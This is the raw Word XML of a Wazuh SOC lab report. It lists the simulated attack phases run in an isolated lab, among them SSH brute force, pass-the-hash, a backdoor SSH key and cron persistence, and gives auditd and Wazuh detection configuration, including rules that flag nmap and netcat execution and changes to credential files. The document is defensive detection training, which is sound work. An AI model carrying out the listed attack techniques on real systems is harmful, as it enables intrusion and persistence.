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C1371" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>wazuh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3585F9"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1372" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="777777"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Full Attack &amp; Detection Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1373" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>Wazuh SOC Engineer Simulation Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1374" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Full Attack &amp; Detection Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1375" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="20" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>Wazuh 4.14.5  ·  Ubuntu 24.04.4 LTS  ·  Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6586"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1378" w14:textId="77777777" w:rsidTr="00A0141D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6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7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wazuh 4.14.5 (All-in-One)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C137B" w14:textId="77777777" w:rsidTr="00A0141D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9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Agent OS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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu 24.04.4 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C137E" w14:textId="77777777" w:rsidTr="00A0141D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C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Attacker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D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux (Rolling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1381" w14:textId="77777777" w:rsidTr="00A0141D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7F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0" w14:textId="17E21A12" w:rsidR="00E3256E" w:rsidRPr="008971ED" w:rsidRDefault="008971ED">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>07/06/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1384" w14:textId="77777777" w:rsidTr="00A0141D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2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3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated lab network only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1387" w14:textId="77777777" w:rsidTr="00A0141D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5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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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9FAD4" w14:textId="77777777" w:rsidR="00A0141D" w:rsidRPr="00A0141D" w:rsidRDefault="00A0141D" w:rsidP="00A0141D">
            <w:pPr>
              <w:pStyle w:val="font-claude-response-body"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A0141D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab-Validated — Review and Adapt Before Production Deployment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1386" w14:textId="3039EB05" w:rsidR="00E3256E" w:rsidRDefault="00E3256E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1388" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1389" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C138A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="280" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Attack Phases Executed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3681"/>
        <w:gridCol w:w="2368"/>
        <w:gridCol w:w="1054"/>
        <w:gridCol w:w="1735"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="0017415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C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153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D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK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E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153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8F" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153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3256E" w14:paraId="5D2C1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1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Nmap Reconnaissance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3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4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5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7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SSH Brute Force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9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T1110.001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A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B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D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SMB Enumeration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9F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0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1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3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>NTLM Hash + Pass-the-Hash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5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T1550.002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6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7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9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>User Account Creation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B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T1136.001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C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D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AF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Password Hash Written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1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T1003.008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2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3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5" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Backdoor SSH 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7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T1098.004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8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9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B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr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C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Crontab Persistence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D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T1053.003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E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BF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  <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr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2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>File Staging in /tmp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3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T1074.001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4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5" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2D6A0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DETECTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C13C7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13C8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13C9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>1.1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3256E" w14:paraId="5D2C1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A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 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B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All-in-One: Manager + Indexer (OpenSearch) + Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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D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Agent Target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CE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu 24.04.4 LTS — Agent ID 001, v4.14.5, Status: Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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0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Attacker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1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux Rolling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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3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KALI_IP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4" w14:textId="2A76F16C" w:rsidR="00E3256E" w:rsidRPr="00BE039C" w:rsidRDefault="00BE039C">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>192.168.121.18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C13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6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AGENT_IP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7" w14:textId="6C0AC224" w:rsidR="00E3256E" w:rsidRPr="00BE039C" w:rsidRDefault="00BE039C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE039C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>192.168.121.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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9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WAZUH_IP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3DA" w14:textId="66224684" w:rsidR="00E3256E" w:rsidRPr="00BE039C" w:rsidRDefault="00BE039C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE039C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>192.168.121.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C13DC" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C13DD" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>1.2 Agent Status — Verified Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13DE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Confirm the agent is active and reporting before starting any simulation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13DF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3E0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3E1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/var/ossec/bin/agent_control -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C13E3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3E5" w14:textId="017C5113" w:rsidR="00E3256E" w:rsidRDefault="008B7237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382AD8C" wp14:editId="16D51D4E">
                  <wp:extent cx="5943600" cy="2811145"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="6777097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3E7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1.1 — Wazuh Endpoints panel: agent 001 active (Ubuntu 24.04.4 LTS, v4.14.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDDB0D2" w14:textId="77777777" w:rsidR="008B7237" w:rsidRDefault="008B7237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C13E8" w14:textId="193EF8DB" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3 Agent Detail — MITRE ATT&amp;CK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E3256E" w14:paraId="5D2C1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3EA" w14:textId="43B7C43E" w:rsidR="00E3256E" w:rsidRDefault="00C769B6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48D16C3" wp14:editId="7BF05D3B">
                  <wp:extent cx="5926455" cy="2827655"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3850594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82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3EC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1.2 — Agent overview page: MITRE ATT&amp;CK top tactics visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13ED" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>1.4 Wazuh Services Health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3EE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3EF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systemctl is-active wazuh-manager wazuh-indexer wazuh-dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C13F1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3F3" w14:textId="556699CD" w:rsidR="00E3256E" w:rsidRDefault="003749E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07AA681" wp14:editId="6A5EE43B">
                  <wp:extent cx="5935345" cy="1176655"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="4445"/>
                  <wp:docPr id="16402540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3F5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1.3 — All three Wazuh services active (running)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13F6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13F7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Environment Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C13F8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.1 Auditd — Install and Enable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3F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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C13F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apt install -y auditd audispd-plugins</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C13F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systemctl enable --now auditd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C13F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systemctl status auditd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C13FE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00" w14:textId="110BA892" w:rsidR="00E3256E" w:rsidRDefault="00BB4E5B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006ADBF" wp14:editId="470E7783">
                  <wp:extent cx="5935345" cy="3471545"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:docPr id="6334745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347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02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2.1 — auditd.service active (running), augenrules loaded with status=SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1403" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.2 Audit Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1404" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>soc.rules — Core Identity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0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File: /etc/audit/rules.d/soc.rules</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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/etc/passwd -p wa -k identity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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/etc/shadow -p wa -k identity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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/etc/sudoers -p wa -k privilege-escalation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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/etc/ssh/sshd_config -p wa -k sshd-config</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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-k exec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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openat -F exit=-EACCES -k access-denied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C140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/var/log/auth.log -p wa -k auth-log-tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C140F" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>wazuh-lab.rules — Lab-Specific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1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File: /etc/audit/rules.d/wazuh-lab.rules</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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/etc/sudoers -p wa -k sudoers_change</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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/home -p wa -k home_dir_write</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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/root/.ssh -p wa -k ssh_keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-w /var/log/samba -p rwa -k samba_activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-F exe=/usr/bin/nmap -k recon_tool</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-F exe=/usr/bin/nc -k netcat_exec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-F exe=/usr/sbin/useradd -k user_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-F exe=/usr/sbin/usermod -k user_mod</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141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-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/passwd -k passwd_change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C141B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1C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Apply rules</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C141D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augenrules --load &amp;&amp; sudo systemctl restart auditd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C141F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21" w14:textId="6B9C9C40" w:rsidR="00E3256E" w:rsidRDefault="00A33931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BE5E08C" wp14:editId="48CFEBF9">
                  <wp:extent cx="5935345" cy="4817745"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
                  <wp:docPr id="208598578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481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23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lastRenderedPageBreak/>
        <w:t>Figure 2.2 — Combined audit rules content (soc.rules + wazuh-lab.rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1424" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.3 Agent Log Sources — ossec.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1425" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Add these localfile entries inside &lt;ossec_config&gt; in /var/ossec/etc/ossec.conf on the Ubuntu agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1426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2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File: /var/ossec/etc/ossec.conf (add inside &lt;ossec_config&gt;)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;log_format&gt;audit&lt;/log_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;location&gt;/var/log/audit/audit.log&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;log_format&gt;syslog&lt;/log_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C142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&lt;location&gt;/var/log/samba/log.smbd&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1431" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;log_format&gt;syslog&lt;/log_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;location&gt;/var/log/auth.log&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1436" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;log_format&gt;syslog&lt;/log_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;location&gt;/var/ossec/logs/active-responses.log&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C143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&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C143C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3E" w14:textId="2E0C1416" w:rsidR="00E3256E" w:rsidRDefault="00CD0EF3">
            <w:pPr>
              <w:spacing w:before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BB53FF" wp14:editId="28C87A64">
                  <wp:extent cx="5943600" cy="5164455"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3999761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16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40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2.3 — ossec.conf localfile sources configured on Ubuntu agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1441" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.4 FIM — Syscheck Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1442" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Add these directory entries inside &lt;syscheck&gt; in ossec.conf on the Ubuntu agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1443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4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Add inside &lt;syscheck&gt; in ossec.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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 realtime='yes'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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/var/spool/cron</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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  <w:p w14:paraId="5D2C144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 realtime='yes'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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/home</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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  <w:p w14:paraId="5D2C144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 realtime='yes'&gt;</w:t>
            </w:r>
